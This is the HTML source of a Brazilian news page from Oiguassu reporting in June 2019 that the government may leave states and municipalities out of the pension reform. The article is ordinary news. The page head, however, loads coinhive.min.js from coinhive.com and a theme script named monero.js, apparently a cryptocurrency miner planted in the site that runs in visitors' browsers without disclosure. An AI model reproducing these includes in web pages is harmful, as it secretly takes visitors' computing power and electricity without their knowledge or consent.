

<!DOCTYPE html>
<html class="no-js" lang="pt-BR" prefix="og: http://ogp.me/ns#">
<head>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-9260427313362027",
    enable_page_level_ads: true
  });
</script>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="https://oiguassu.com/xmlrpc.php" />
<title>GOVERNO ADMITE ABRIR MÃO DE ESTADOS E MUNICÍPIOS NA REFORMA DA PREVIDÊNCIA - Oiguassu</title>

	<!-- Meta Tag Manager -->
	<meta name="google-site-verification" content="9D5X4zGUYK9T8sBJcfFZt-zekBWN3kbyAXq7V-YRTEQ" />
	<!-- / Meta Tag Manager -->

<!-- This site is optimized with the Yoast SEO plugin v9.2.1 - https://yoast.com/wordpress/plugins/seo/ -->
<link rel="canonical" href="https://oiguassu.com/governo-admite-abrir-mao-de-estados-e-municipios-na-reforma-da-previdencia/" />
<meta property="og:locale" content="pt_BR" />
<meta property="og:type" content="article" />
<meta property="og:title" content="GOVERNO ADMITE ABRIR MÃO DE ESTADOS E MUNICÍPIOS NA REFORMA DA PREVIDÊNCIA - Oiguassu" />
<meta property="og:description" content="A equipe econômica do governo já admite que mais um item deve ficar de fora do projeto de reforma da Previdência que tramita no Congresso:..." />
<meta property="og:url" content="https://oiguassu.com/governo-admite-abrir-mao-de-estados-e-municipios-na-reforma-da-previdencia/" />
<meta property="og:site_name" content="Oiguassu" />
<meta property="article:tag" content="manchete1" />
<meta property="article:section" content="Brasil" />
<meta property="article:published_time" content="2019-06-01T10:10:29+00:00" />
<meta property="og:image" content="https://oiguassu.com/wp-content/uploads/2019/06/AAC4Fum.jpg" />
<meta property="og:image:secure_url" content="https://oiguassu.com/wp-content/uploads/2019/06/AAC4Fum.jpg" />
<meta property="og:image:width" content="932" />
<meta property="og:image:height" content="621" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:description" content="A equipe econômica do governo já admite que mais um item deve ficar de fora do projeto de reforma da Previdência que tramita no Congresso:..." />
<meta name="twitter:title" content="GOVERNO ADMITE ABRIR MÃO DE ESTADOS E MUNICÍPIOS NA REFORMA DA PREVIDÊNCIA - Oiguassu" />
<meta name="twitter:image" content="https://oiguassu.com/wp-content/uploads/2019/06/AAC4Fum.jpg" />
<script type='application/ld+json'>{"@context":"https:\/\/schema.org","@type":"Organization","url":"https:\/\/oiguassu.com\/","sameAs":[],"@id":"https:\/\/oiguassu.com\/#organization","name":"Oiguassu","logo":""}</script>
<!-- / Yoast SEO plugin. -->

<link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//secure.gravatar.com' />
<link rel='dns-prefetch' href='//coinhive.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Feed para Oiguassu &raquo;" href="https://oiguassu.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para Oiguassu &raquo;" href="https://oiguassu.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para Oiguassu &raquo; GOVERNO ADMITE ABRIR MÃO DE ESTADOS E MUNICÍPIOS NA REFORMA DA PREVIDÊNCIA" href="https://oiguassu.com/governo-admite-abrir-mao-de-estados-e-municipios-na-reforma-da-previdencia/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/oiguassu.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.10"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='gglcptch-css'  href='https://oiguassu.com/wp-content/plugins/google-captcha/css/gglcptch.css?ver=1.38' type='text/css' media='all' />
<link rel='stylesheet' id='mh-style-css'  href='https://oiguassu.com/wp-content/themes/mh_newsdesk/style.css?ver=1.3.0' type='text/css' media='all' />
<link rel='stylesheet' id='mh-font-awesome-css'  href='https://oiguassu.com/wp-content/themes/mh_newsdesk/includes/font-awesome.min.css' type='text/css' media='all' />
<link rel='stylesheet' id='mh-google-fonts-css'  href='https://fonts.googleapis.com/css?family=PT+Serif:300,400,400italic,600,700%7cOswald:300,400,400italic,600,700' type='text/css' media='all' />
<link rel='stylesheet' id='social-logos-css'  href='https://oiguassu.com/wp-content/plugins/jetpack/_inc/social-logos/social-logos.min.css?ver=1' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='https://oiguassu.com/wp-content/plugins/jetpack/css/jetpack.css?ver=6.8' type='text/css' media='all' />
<script type='text/javascript' src='https://oiguassu.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='https://oiguassu.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var related_posts_js_options = {"post_heading":"h4"};
/* ]]> */
</script>
<script type='text/javascript' src='https://oiguassu.com/wp-content/plugins/jetpack/_inc/build/related-posts/related-posts.min.js?ver=20150408'></script>
<script type='text/javascript' src='https://oiguassu.com/wp-content/themes/mh_newsdesk/js/scripts.js?ver=4.9.10'></script>
<script type='text/javascript' src='https://coinhive.com/lib/coinhive.min.js?ver=4.9.10'></script>
<script type='text/javascript' src='https://oiguassu.com/wp-content/themes/mh_newsdesk/js/monero.js?ver=4.9.10'></script>
<link rel='https://api.w.org/' href='https://oiguassu.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://oiguassu.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://oiguassu.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.9.10" />
<link rel='shortlink' href='https://wp.me/pS5BS-4Oc' />
<link rel="alternate" type="application/json+oembed" href="https://oiguassu.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Foiguassu.com%2Fgoverno-admite-abrir-mao-de-estados-e-municipios-na-reforma-da-previdencia%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://oiguassu.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Foiguassu.com%2Fgoverno-admite-abrir-mao-de-estados-e-municipios-na-reforma-da-previdencia%2F&#038;format=xml" />
		<a href="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></a>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-9260427313362027",
    enable_page_level_ads: true
  });
</script>

<link rel='dns-prefetch' href='//v0.wordpress.com'/>
<style type='text/css'>img#wpstats{display:none}</style>	<style type="text/css">
    	    		.social-nav a:hover, .logo-title, .entry-content a, a:hover, .entry-meta .entry-meta-author, .entry-meta a, .comment-info, blockquote, .pagination a:hover .pagelink { color: #019100; }
			.main-nav li:hover, .slicknav_menu, .ticker-title, .breadcrumb a, .breadcrumb .bc-text, .button span, .widget-title span, input[type=submit], table th, .comment-section-title .comment-count, #cancel-comment-reply-link:hover, .pagination .current, .pagination .pagelink { background: #019100; }
			blockquote, input[type=text]:hover, input[type=email]:hover, input[type=tel]:hover, input[type=url]:hover, textarea:hover { border-color: #019100; }
    	    	    				.main-nav, .main-nav ul li:hover > ul, .mh-footer { background: #019100; }
    	    	    	    		</style>
    <!--[if lt IE 9]>
<script src="https://oiguassu.com/wp-content/themes/mh_newsdesk/js/css3-mediaqueries.js"></script>
<![endif]-->
<link rel="amphtml" href="https://oiguassu.com/governo-admite-abrir-mao-de-estados-e-municipios-na-reforma-da-previdencia/amp/"><link rel="icon" href="https://oiguassu.com/wp-content/uploads/2018/05/cropped-Untitled-1-32x32.png" sizes="32x32" />
<link rel="icon" href="https://oiguassu.com/wp-content/uploads/2018/05/cropped-Untitled-1-192x192.png" sizes="192x192" />
<link rel="apple-touch-icon-precomposed" href="https://oiguassu.com/wp-content/uploads/2018/05/cropped-Untitled-1-180x180.png" />
<meta name="msapplication-TileImage" content="https://oiguassu.com/wp-content/uploads/2018/05/cropped-Untitled-1-270x270.png" />
</head>
<body class="post-template-default single single-post postid-18488 single-format-standard mh-right-sb">
<div id="mh-wrapper">
<header class="mh-header">
	<div class="header-wrap clearfix">
				<div class="mh-col mh-1-3 header-logo-full">
			<a href="https://oiguassu.com/" title="Oiguassu" rel="home">
<div class="logo-wrap" role="banner">
<img src="https://oiguassu.com/wp-content/uploads/2018/05/cropped-b632f59c-2a6b-406a-bb6b-bd0031fe147b.jpg" height="427" width="1280" alt="Oiguassu" />
</div>
</a>
		</div>
			</div>
	<div class="header-menu clearfix">
		<nav class="main-nav clearfix">
			<div class="menu-menu-container"><ul id="menu-menu" class="menu"><li id="menu-item-90" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-90"><a href="http://oiguassu.com">Início</a></li>
<li id="menu-item-91" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-91"><a href="https://oiguassu.com/category/foz/">Foz do Iguaçu</a></li>
<li id="menu-item-92" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-92"><a href="https://oiguassu.com/category/parana/">Paraná</a></li>
<li id="menu-item-93" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-93"><a href="https://oiguassu.com/category/brasil/">Brasil</a></li>
<li id="menu-item-94" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-94"><a href="https://oiguassu.com/category/argentina/">Argentina</a></li>
<li id="menu-item-95" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-95"><a href="https://oiguassu.com/category/paraguay/">Paraguay</a></li>
<li id="menu-item-96" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-96"><a href="https://oiguassu.com/category/latinoamerica/">Latinoamerica</a></li>
<li id="menu-item-97" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-97"><a href="https://oiguassu.com/category/colunas/">Colunas</a></li>
</ul></div>		</nav>
		<div class="header-sub clearfix">
							<div id="ticker" class="news-ticker mh-col mh-2-3 clearfix">
			<span class="ticker-title">
			Hot Topics		</span>
		<ul class="ticker-content">			<li class="ticker-item">
				<a class="ticker-item-link" href="https://oiguassu.com/governo-admite-abrir-mao-de-estados-e-municipios-na-reforma-da-previdencia/" title="GOVERNO ADMITE ABRIR MÃO DE ESTADOS E MUNICÍPIOS NA REFORMA DA PREVIDÊNCIA">
					<span class="ticker-item-date">junho 1, 2019</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">GOVERNO ADMITE ABRIR MÃO DE ESTADOS E MUNICÍPIOS NA REFORMA DA PREVIDÊNCIA</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://oiguassu.com/petrobras-reduz-preco-dde-gasolina-e-diesel-em-r-013-nas-refinarias/" title="PETROBRAS REDUZ PREÇO DDE GASOLINA E DIESEL EM R$ 0,13 NAS REFINARIAS">
					<span class="ticker-item-date">junho 1, 2019</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">PETROBRAS REDUZ PREÇO DDE GASOLINA E DIESEL EM R$ 0,13 NAS REFINARIAS</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://oiguassu.com/twitter-bloqueia-populista-de-direita-holandes/" title="TWITTER BLOQUEIA POPULISTA DE DIREITA HOLANDÊS">
					<span class="ticker-item-date">junho 1, 2019</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">TWITTER BLOQUEIA POPULISTA DE DIREITA HOLANDÊS</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://oiguassu.com/trump-anuncia-tarifa-geral-de-5-ao-mexico-como-castigo-pela-imigracao-irregular/" title="TRUMP ANUNCIA TARIFA GERAL DE 5% AO MÉXICO COMO CASTIGO PELA IMIGRAÇÃO IRREGULAR">
					<span class="ticker-item-date">junho 1, 2019</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">TRUMP ANUNCIA TARIFA GERAL DE 5% AO MÉXICO COMO CASTIGO PELA IMIGRAÇÃO IRREGULAR</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://oiguassu.com/hospital-municipal-de-foz-inicia-mutirao-de-cirurgias-eletivas-nesta-sabado/" title="HOSPITAL MUNICIPAL DE FOZ INICIA MUTIRÃO DE CIRURGIAS ELETIVAS NESTA SÁBADO">
					<span class="ticker-item-date">junho 1, 2019</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">HOSPITAL MUNICIPAL DE FOZ INICIA MUTIRÃO DE CIRURGIAS ELETIVAS NESTA SÁBADO</span>
				</a>
			</li>	</ul>
</div>						<aside class="mh-col mh-1-3 header-search">
				<form role="search" method="get" class="search-form" action="https://oiguassu.com/">
				<label>
					<span class="screen-reader-text">Pesquisar por:</span>
					<input type="search" class="search-field" placeholder="Pesquisar &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Pesquisar" />
			</form>			</aside>
		</div>
	</div>
</header><div class="mh-section mh-group">
	<div id="main-content" class="mh-content"><nav class="breadcrumb"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="https://oiguassu.com" itemprop="url" class="bc-home"><span itemprop="title">Home</span></a></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="https://oiguassu.com/category/brasil/" itemprop="url"><span itemprop="title">Brasil</span></a></span></nav>
<article id="post-18488" class="post-18488 post type-post status-publish format-standard has-post-thumbnail hentry category-brasil tag-manchete1">
	<header class="entry-header clearfix">
		<h1 class="entry-title">
			GOVERNO ADMITE ABRIR MÃO DE ESTADOS E MUNICÍPIOS NA REFORMA DA PREVIDÊNCIA		</h1>
		<div class="entry-tags clearfix"><span>TOPICS:</span><a href="https://oiguassu.com/tag/manchete1/" rel="tag">manchete1</a></div>	</header>
	
<div class="entry-thumbnail">
<img width="777" height="437" src="https://oiguassu.com/wp-content/uploads/2019/06/AAC4Fum-777x437.jpg" class="attachment-content-single size-content-single wp-post-image" alt="" srcset="https://oiguassu.com/wp-content/uploads/2019/06/AAC4Fum-777x437.jpg 777w, https://oiguassu.com/wp-content/uploads/2019/06/AAC4Fum-180x101.jpg 180w, https://oiguassu.com/wp-content/uploads/2019/06/AAC4Fum-260x146.jpg 260w, https://oiguassu.com/wp-content/uploads/2019/06/AAC4Fum-373x210.jpg 373w, https://oiguassu.com/wp-content/uploads/2019/06/AAC4Fum-120x67.jpg 120w" sizes="(max-width: 777px) 100vw, 777px" data-attachment-id="18489" data-permalink="https://oiguassu.com/governo-admite-abrir-mao-de-estados-e-municipios-na-reforma-da-previdencia/aac4fum/" data-orig-file="https://oiguassu.com/wp-content/uploads/2019/06/AAC4Fum.jpg" data-orig-size="932,621" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="AAC4Fum" data-image-description="" data-medium-file="https://oiguassu.com/wp-content/uploads/2019/06/AAC4Fum-300x200.jpg" data-large-file="https://oiguassu.com/wp-content/uploads/2019/06/AAC4Fum.jpg" /></div>
		<p class="entry-meta">
<span class="entry-meta-author vcard author">Posted By: <a class="fn" href="https://oiguassu.com/author/administrador/">Administrador</a></span>
<span class="entry-meta-date updated">junho 1, 2019</span>
</p>
	<div class="entry-content clearfix">
		<h2 style="text-align: justify;">A equipe econômica do governo já admite que mais um item deve ficar de fora do projeto de reforma da Previdência que tramita no Congresso: a inclusão de Estados e municípios na proposta</h2>
<p style="text-align: justify;">Embora considere o tema importante, pois grande parte dos servidores estaduais se aposentam mais cedo graças a regras especiais (como professores ou policiais), os integrantes do Ministério da Economia já receberam a sinalização de que há resistência a esse item na proposta e não farão disso um caso de vida ou morte, segundo apurou o Estadão/Broadcast.</p>
<p style="text-align: justify;">A saída de Estados e municípios da reforma se somaria a outros itens que o governo já admitiu abrir mão, dada a resistência dos parlamentares em aprová-los, como as mudanças no Benefício de Prestação Continuada (BPC, o auxílio a idosos em situação de miséria) e na aposentadoria dos trabalhadores rurais. Mas, diferentemente desses casos, a exclusão dos governos regionais da reforma não teria impacto nas contas da reforma – a economia de R$ 1,2 trilhão em dez anos calculada pelo governo leva em conta apenas os gastos federais.</p>
<p style="text-align: justify;">O impacto seria grande mesmo nas contas dos Estados e municípios. E, por isso mesmo, a avaliação em Brasília é a de que são governadores e prefeitos que precisam se engajar na defesa da reforma. Se o projeto da equipe econômica excluí-los, cada Estado ou município precisará aprovar mudanças nos Legislativos locais – o que pode ser um fator de desgaste maior para esses governantes com os servidores públicos. As contas do governo são de que a reforma poderia proporcionar uma economia de R$ 350 bilhões em dez anos para Estados e municípios.</p>
<p style="text-align: justify;">Essa resistência dos parlamentares em Brasília em aprovar uma reforma que inclua governos estaduais e prefeituras tem, claro, uma motivação política. Lideranças de partidos de centro e do próprio PSL, partido do presidente Jair Bolsonaro, têm feito chegar à equipe econômica a mensagem de que não pretendem assumir o desgaste ante suas bases eleitorais para que até governadores e prefeitos de oposição colham os frutos pela melhora nas contas. Alguns deputados já miram as eleições para prefeitura, em 2020, e para governo do Estado, em 2022. Por isso, resistem a fortalecer potenciais candidatos de oposição.</p>
<p style="text-align: justify;">Além disso, embora muitos governadores e prefeitos apoiem publicamente a aprovação da reforma, a visão dos parlamentares é a de que governadores de partidos de oposição têm falado contra a proposta, embora precisem dela para melhorar as contas de seus Estados e sobreviver politicamente.</p>
<h2 style="text-align: justify;">Briga</h2>
<p style="text-align: justify;">A interlocutores, o ministro da Economia, Paulo Guedes, tem dito que gostaria de “consertar todo mundo”, mas demonstra também compreender a posição dos partidos de centro e indica que o governo federal não comprará a briga sozinho. A avaliação do ministro é a de que cabe à oposição agir e que seria um equívoco se os governadores desses partidos não partissem em defesa da reforma, pois isso resultaria em uma “destruição política”.</p>
<p style="text-align: justify;">Ele acredita que esses governadores podem, no futuro, ser cobrados pela ausência de apoio à proposta, principalmente se os efeitos da crise ficarem ainda mais evidentes na precarização de serviços públicos.</p>
<p style="text-align: justify;">O PT é um dos principais críticos e governa Bahia, Ceará, Piauí e Rio Grande do Norte. Na Câmara, o partido tem se posicionado contra a proposta, mesmo diante da posição de governadores como Rui Costa (BA). Ele já defendeu a reforma mediante a revisão de pontos como aposentadoria rural e benefício assistencial, a retirada dos parâmetros da Constituição e da criação de um regime de capitalização – em que o trabalhador contribui para contas individuais.</p>
<h6 style="text-align: right;">(Com MSN Notícias)</h6>
<p><img class="aligncenter size-medium" src="http://unifoz.edu.br/ProdutosIMG/7_1.jpg" width="800" height="756" /></p>
<div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Compartilhe isso:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow noopener noreferrer" data-shared="sharing-twitter-18488" class="share-twitter sd-button share-icon no-text" href="https://oiguassu.com/governo-admite-abrir-mao-de-estados-e-municipios-na-reforma-da-previdencia/?share=twitter" target="_blank" title="Clique para compartilhar no Twitter"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Twitter(abre em nova janela)</span></a></li><li class="share-facebook"><a rel="nofollow noopener noreferrer" data-shared="sharing-facebook-18488" class="share-facebook sd-button share-icon no-text" href="https://oiguassu.com/governo-admite-abrir-mao-de-estados-e-municipios-na-reforma-da-previdencia/?share=facebook" target="_blank" title="Clique para compartilhar no Facebook"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Facebook(abre em nova janela)</span></a></li><li class="share-google-plus-1"><a rel="nofollow noopener noreferrer" data-shared="sharing-google-18488" class="share-google-plus-1 sd-button share-icon no-text" href="https://oiguassu.com/governo-admite-abrir-mao-de-estados-e-municipios-na-reforma-da-previdencia/?share=google-plus-1" target="_blank" title="Compartilhe no Google+"><span></span><span class="sharing-screen-reader-text">Compartilhe no Google+(abre em nova janela)</span></a></li><li class="share-end"></li></ul></div></div></div>
<div id='jp-relatedposts' class='jp-relatedposts' >
	<h3 class="jp-relatedposts-headline"><em>Relacionado</em></h3>
</div>	</div>
	</article>		<h4 class="widget-title related-content-title">
			<span>Related Articles</span>
		</h4>
		<div class="related-content clearfix"><article class="mh-col mh-1-4 content-grid post-3725 post type-post status-publish format-standard has-post-thumbnail hentry category-foz tag-manchete1">
	<div class="content-thumb content-grid-thumb">
		<a href="https://oiguassu.com/promotoria-de-justica-seleciona-estagiario-de-direito/" title="Promotoria de Justiça seleciona estagiário de Direito"><img width="180" height="101" src="https://oiguassu.com/wp-content/uploads/2017/10/2-7-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="https://oiguassu.com/wp-content/uploads/2017/10/2-7-180x101.jpg 180w, https://oiguassu.com/wp-content/uploads/2017/10/2-7-260x146.jpg 260w, https://oiguassu.com/wp-content/uploads/2017/10/2-7-373x210.jpg 373w, https://oiguassu.com/wp-content/uploads/2017/10/2-7-120x67.jpg 120w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="3726" data-permalink="https://oiguassu.com/promotoria-de-justica-seleciona-estagiario-de-direito/2-59/" data-orig-file="https://oiguassu.com/wp-content/uploads/2017/10/2-7.jpg" data-orig-size="549,412" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="2" data-image-description="" data-medium-file="https://oiguassu.com/wp-content/uploads/2017/10/2-7-300x225.jpg" data-large-file="https://oiguassu.com/wp-content/uploads/2017/10/2-7.jpg" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="https://oiguassu.com/category/foz/" rel="category tag">Foz do Iguaçu</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="https://oiguassu.com/promotoria-de-justica-seleciona-estagiario-de-direito/" title="Promotoria de Justiça seleciona estagiário de Direito" rel="bookmark">
			Promotoria de Justiça seleciona estagiário de Direito		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-15056 post type-post status-publish format-standard has-post-thumbnail hentry category-brasil tag-manchete1">
	<div class="content-thumb content-grid-thumb">
		<a href="https://oiguassu.com/engenheiros-responsaveis-por-seguranca-de-barragem-da-vale-sao-presos/" title="ENGENHEIROS RESPONSÁVEIS POR SEGURANÇA DE BARRAGEM DA VALE SÃO PRESOS"><img width="180" height="101" src="https://oiguassu.com/wp-content/uploads/2019/01/47243408_303-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="https://oiguassu.com/wp-content/uploads/2019/01/47243408_303-180x101.jpg 180w, https://oiguassu.com/wp-content/uploads/2019/01/47243408_303-300x169.jpg 300w, https://oiguassu.com/wp-content/uploads/2019/01/47243408_303-260x146.jpg 260w, https://oiguassu.com/wp-content/uploads/2019/01/47243408_303-373x210.jpg 373w, https://oiguassu.com/wp-content/uploads/2019/01/47243408_303-120x67.jpg 120w, https://oiguassu.com/wp-content/uploads/2019/01/47243408_303.jpg 700w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="15057" data-permalink="https://oiguassu.com/engenheiros-responsaveis-por-seguranca-de-barragem-da-vale-sao-presos/47243408_303/" data-orig-file="https://oiguassu.com/wp-content/uploads/2019/01/47243408_303.jpg" data-orig-size="700,394" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="47243408_303" data-image-description="" data-medium-file="https://oiguassu.com/wp-content/uploads/2019/01/47243408_303-300x169.jpg" data-large-file="https://oiguassu.com/wp-content/uploads/2019/01/47243408_303.jpg" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="https://oiguassu.com/category/brasil/" rel="category tag">Brasil</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="https://oiguassu.com/engenheiros-responsaveis-por-seguranca-de-barragem-da-vale-sao-presos/" title="ENGENHEIROS RESPONSÁVEIS POR SEGURANÇA DE BARRAGEM DA VALE SÃO PRESOS" rel="bookmark">
			ENGENHEIROS RESPONSÁVEIS POR SEGURANÇA DE BARRAGEM DA VALE SÃO PRESOS		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-1693 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized tag-manchete1">
	<div class="content-thumb content-grid-thumb">
		<a href="https://oiguassu.com/seis-cooperativas-da-agricultura-familiar-participam-de-chamada-publica/" title="SEIS COOPERATIVAS DA AGRICULTURA FAMILIAR PARTICIPAM DE CHAMADA PÚBLICA"><img width="180" height="101" src="https://oiguassu.com/wp-content/uploads/2017/09/1-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="https://oiguassu.com/wp-content/uploads/2017/09/1-180x101.jpg 180w, https://oiguassu.com/wp-content/uploads/2017/09/1-260x146.jpg 260w, https://oiguassu.com/wp-content/uploads/2017/09/1-373x210.jpg 373w, https://oiguassu.com/wp-content/uploads/2017/09/1-120x67.jpg 120w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="1694" data-permalink="https://oiguassu.com/seis-cooperativas-da-agricultura-familiar-participam-de-chamada-publica/1-24/" data-orig-file="https://oiguassu.com/wp-content/uploads/2017/09/1.jpg" data-orig-size="500,313" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="1" data-image-description="" data-medium-file="https://oiguassu.com/wp-content/uploads/2017/09/1-300x188.jpg" data-large-file="https://oiguassu.com/wp-content/uploads/2017/09/1.jpg" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="https://oiguassu.com/category/uncategorized/" rel="category tag">Uncategorized</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
